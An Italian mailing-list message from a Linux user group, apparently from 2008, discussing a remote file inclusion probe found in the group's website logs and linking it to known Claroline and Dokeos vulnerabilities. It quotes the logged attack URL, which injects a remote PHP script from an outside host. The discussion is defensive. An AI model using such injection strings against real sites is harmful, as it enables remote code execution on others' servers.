[bglug] Defacing... qualcuno ci prova sempre...
Giuseppe Capizzi
redstarlabs@gmail.com
Mer 23 Apr 2008 19:30:34 CEST
Il giorno mer, 23/04/2008 alle 13.13 +0200, Andrea Mangiatordi ha
scritto:
> Cari tutti,
> stavo dando un'occhiata alle statistiche di accesso al sito del LUG. Ho
> notato che qualcuno ha puntato a questa url:
>
> http://bglug.linux.it/?rootSys=http://m4r0c.com/rfi-scan/test.txt???
>
> l'url passata come parametro get contiene del codice php che fa una
> serie di check su alcune delle vulnerabilità più note, in particolare
> sul valore dell'opzione secure_mode di php.
>
> Wordpress dovrebbe essere abbastanza al sicuro da questo tipo di
> attacchi, ma mi piacerebbe comunque sentire il parere di qualche esperto
> di sicurezza della lista circa l'argomento.
Esperto di sicurezza proprio non sono, però googlando ho scoperto che
si tratta di exploit per delle vulnerabilità [1][2] delle piattaforme di
elearning Claroline [3] e Dokeos [4] (la seconda è un recente fork della
prima). I nostri attaccanti evidentemente, per non sapere né leggere né
scrivere, li provano indiscriminatamente su un sacco di domini sperando
di trovare qualche sfortunato utente di queste piattaforme.
In ogni caso dobbiamo tenere in conto il rischio di attacchi. L'ultima
versione del ramo 2.3 di Worpress, quella che abbiamo installato noi,
non ha vulnerabilità note (che io sappia). Questo ci tiene al riparo
almeno dagli attacchi dei lameroni che sfruttano gli exploit copiati dai
siti di sicurezza. Non so niente sul nuovo ramo di sviluppo, il 2.5...
[1] http://www.frsirt.com/english/advisories/2006/1303
[2] http://www.frsirt.com/english/advisories/2006/1701
[3] http://www.claroline.net/
[4] http://www.dokeos.com/
--
Maggiori informazioni sulla lista
bglug